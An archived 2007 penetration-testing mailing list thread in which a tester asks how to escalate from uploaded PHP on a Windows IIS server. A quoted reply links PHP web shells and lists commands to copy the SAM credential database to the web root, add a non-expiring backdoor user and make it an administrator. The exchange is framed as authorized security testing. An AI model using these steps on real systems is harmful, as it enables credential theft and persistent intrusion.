Penetration Testing mailing list archives
Re: PHP Exploitation
From: Danux <danuxx () gmail com>
Date: Mon, 26 Nov 2007 23:38:08 +0000
First of all, thanks all for your excellent help, and answering DokFLeed.. yes, it is a authorized client to whom i am testing his PHP APP. But unfortunately the PHP APP dont have Zend Optimizer installed and the other one (r57shell) is for Unix-like OS and i need a Windows shell. Finally and the most important thing, remember i dont have privilege to run system commands because of IUSR_MACHINE user privileges (Windows IIS-6 PHP-5), so i cant execute PHP Commands like system, proc_open, passthru, exec, etc, so even though r57shell would have being used, its based of aforementioned commands so it also would have failed. By now, i am able to connect to my machine through PHP Socket from PHP APP Host (Client), but i think i need to bypass cmd.exe execution (privilege scalation, etc) in order to really own the machine or to assure there is no way to break into the client machine through its PHP APP. Thanks in Advance. On Nov 25, 2007 7:12 AM, DokFLeed <dokfleed () dokfleed net> wrote:
I assume its for the good cause, and you are authorized to do so ?! Upload this to the server http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46 encoded for Zend Optimizer Or http://no.spam.ee/~tonu/phpshell/r57shell.txt Try the following commands: ===================== 1) To see whats running on system tasklist -SVC 2) To get a copy of the sam database copy C:\windows\repair\sam C:\www\sam.txt http://hostname/sam.txt 3) To add new user with username tested123 & password tested123 net user tested123 tested123 /add /active:yes /expires:never /passwordchg:yes /passwordreq:yes 4) To make him Administrator net localgroup Administrators tested123 /add 5) Try to RDP to the server , if it is Firewalled!! Download the RDP web front "Remote Desktop Connection Web Connection Software (455 KB)" Start IIS http://hostname /TSweb/ and log to Localhost remember while testing, your imagination is your limitation:), depending on your phpinfo output none of this might work, so you will have to code around it Dok Smoke Dope, Eat Soap, Fly Home in a Bubble ================== ----- Original Message ----- From: "Danux" <danuxx () gmail com> To: <pen-test () securityfocus com> Sent: Friday, November 23, 2007 6:29 AM Subject: PHP ExploitationHi experts, i need your ideas, By now, i am able to upload php files to a Windows 2003 Server, so i can execute php code like phpinfo, but i cant execute passthru command because of lack of IUSR_MACHINE privileges. I have run some local php bof's without success. Do you have another idea to break into the server through php code uploaded? Cheers!!!!! -- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
-- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- PHP Exploitation Danux (Nov 24)
- Re: PHP Exploitation DokFLeed (Nov 25)
- Re: PHP Exploitation Danux (Nov 27)
- Re: PHP Exploitation Kish Pent (Nov 25)
- Re: PHP Exploitation Robin Wood (Nov 27)
- Re: PHP Exploitation Danux (Nov 27)
- Message not available
- Re: PHP Exploitation Danux (Nov 29)
- Re: PHP Exploitation Danux (Nov 27)
- Re: PHP Exploitation DokFLeed (Nov 25)